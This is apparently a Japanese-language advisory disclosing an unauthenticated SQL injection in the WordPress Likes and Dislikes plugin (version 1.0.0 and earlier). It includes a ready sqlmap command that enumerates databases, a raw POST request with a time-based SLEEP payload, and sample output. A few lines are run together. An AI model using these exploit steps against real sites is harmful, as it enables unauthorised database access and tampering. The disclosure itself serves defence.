
WordPress Likes and Dislikes Plugin <= 1.0.0 は、SQLインジェクションに対して脆弱です。
発見者: Khaled_Alenazi (Nxploited)
公開日: 2025年5月27日
WordPress用のLikes and Dislikes Pluginは、1.0.0までの全バージョンにおいて、postパラメータを介したSQLインジェクションに対して脆弱です。
不十分なエスケープ処理とプリペアドステートメントの欠如により、未認証の攻撃者がバックエンドのクエリに生のSQLを注入し、データの漏洩または改ざんを引き起こす可能性があります。
post/wp-admin/admin-ajax.phpsqlmap -u "http://TARGET/wp-admin/admin-ajax.php" \
--data "action=my_likes_dislikes_action&post=1&state=like" \
--method POST --risk 3 --level 5 --batch --time-sec=5 --dbs
このコマンドは、タイムベースの手法を使用してインジェクションポイントを確認し、データベースを列挙します。
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: nxploit.ddev.site
Content-Type: application/x-www-form-urlencoded
Connection: close
action=my_likes_dislikes_action&post=1 AND (SELECT 1234 FROM (SELECT(SLEEP(5)))a)&state=like
SQLMapによる列挙:
boolean-based blind および time-based blind SQLiを検出しました。db、test、information_schema。
Burp Suiteによる手動検証:
15 secondsを超え、真のインジェクションであることを示しています。
postからの入力を直ちにサニタイズし、パラメータ化してください。このコンテンツは教育および研究目的でのみ提供されています。
著者は、明示的な許可なしでの悪意のある活動やシステムの悪用を容認しません。
Khaled_Alenazi (Nxploited)